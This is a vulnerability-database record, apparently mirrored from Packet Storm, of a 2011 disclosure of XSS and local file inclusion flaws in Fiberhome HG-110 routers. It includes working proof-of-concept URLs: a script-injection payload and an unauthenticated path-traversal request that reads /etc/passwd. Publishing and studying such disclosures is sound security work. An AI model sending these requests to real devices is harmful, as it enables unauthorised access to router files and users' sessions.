ID
VAR-E-201104-0473
TITLE
Fiberhome HG-110 Cross Site Scripting / Local File Inclusion
Trust: 0.5
DESCRIPTION
Fiberhome HG-110 routers suffer from cross site scripting and local file inclusion vulnerabilities.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | fiberhome | model: | hg-110 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I found two vulnerabilities on fiberhome hg-110 routers[1] and has not
been reported nor fixed.
XSS:
- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
Local File Include and Directory/Path Traversal:
- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
URLs are accessible without authentication.
Device info:
- - HardwareVersion : HG110_BH_R1A
- - SoftwareVersion : HG110_BH_V1.6
- - Firmware Version : 1.0.0
This vulnerabilities can affect to other version and models of this vendor.
[1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@jabberes.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk2fDfwACgkQIP17Kywx9JSPbwCfXNQs42kMMPcUiw5107MnABJ0
PcUAniDsC0MZplJNquS0mXCtpidLk32r
=UZbN
-----END PGP SIGNATURE-----
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
xss, file inclusion
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | local | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
Zerial
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 100234 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 100234 |
LAST UPDATE DATE
2022-07-27T10:03:34.940000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 100234 | date: | 2011-04-08T21:11:11 |